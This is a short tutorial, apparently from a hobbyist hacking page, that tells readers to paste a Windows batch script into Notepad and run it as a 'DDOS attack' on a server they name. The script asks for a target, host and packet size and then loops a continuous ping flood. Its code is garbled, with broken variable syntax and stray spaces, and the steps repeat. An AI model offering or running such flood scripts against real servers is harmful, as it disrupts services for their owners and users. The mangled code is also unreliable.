DOS Attack Using Notepad
1. Open Notepad.
2. In Notepad paste the following text.
3. Now save the notepad with .bat extension.
Usage: Double click on the create file and enter the server details. That's it!!
1. Open Notepad.
2. In Notepad paste the following text.
@ Echo off
mode 67.16
title DDOS Attack
color 0A
CLS
echo.
Batchfile With DDOS echo
echo.
set / px = Server-Target:
echo.
ping% x%
@ ping.exe 127.0.0.1-n 5-w 1000> nul
goto Next
: Next
echo.
echo.
echo.
set / pm = ip Host:
echo.
set / pn = Packet Size:
echo.
: DDOS
color 0c
echo Attacking Server% m%
m%-ping% i% n%-t> nul
goto DDOS
3. Now save the notepad with .bat extension.
Usage: Double click on the create file and enter the server details. That's it!!